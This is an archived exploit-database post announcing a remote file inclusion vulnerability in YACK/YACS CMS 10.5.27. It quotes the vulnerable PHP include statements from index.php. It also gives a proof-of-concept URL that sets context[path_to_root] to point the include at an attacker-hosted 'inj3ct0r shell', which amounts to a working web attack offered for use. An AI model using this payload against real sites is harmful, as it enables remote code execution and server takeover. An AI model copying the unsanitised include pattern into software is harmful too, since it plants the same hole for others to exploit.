[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

YACK CMS 10.5.27 Remote File Inclusion Vulnerability



====================================================
YACK CMS 10.5.27 Remote File Inclusion Vulnerability
====================================================


 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Vendor:     http://www.yacs.fr
download:   http://www.yacs.fr/file-fetch/1238-20100527-yacs-10-5-27.tgz
Author:     eidelweiss
Contact:    g1xsystem[at]windowslive.com
 
=====================================================================
 
    -=[ vuln c0de ]=-
 
[!] index.php
 
// load global definitions
if($home = getenv('YACS_HOME'))
    include_once str_replace('//', '/', $home.'/').'shared/global.php'; // <= 0
elseif(is_readable('yacs.home') && is_callable('file_get_contents') && ($content = trim(file_get_contents('yacs.home'), " \t\n\r\0\x0B\\/.")) && is_readable($content.'/shared/global.php'))
    include_once $content.'/shared/global.php'; // <= 1
elseif(is_readable('shared/global.php'))
    include_once 'shared/global.php';
elseif(is_readable('yacs/shared/global.php'))
    include_once 'yacs/shared/global.php';
else
    exit('The file shared/global.php has not been found. Please reinstall or mention home directory in file yacs.home or configure the YACS_HOME environment variable.');
 
// load libraries used in this script
include_once $context['path_to_root'].'feeds/feeds.php'; // some links to newsfeeds
include_once $context['path_to_root'].'links/links.php';    //  <= 2 (i dont give fuck)
 
 
=====================================================================
 
    -=[ P0C ]=-
 
    http://127.0.0.1/path/index.php?context[path_to_root]= [inj3ct0r shell]
 
    etc , etc , etc
 
=====================================================================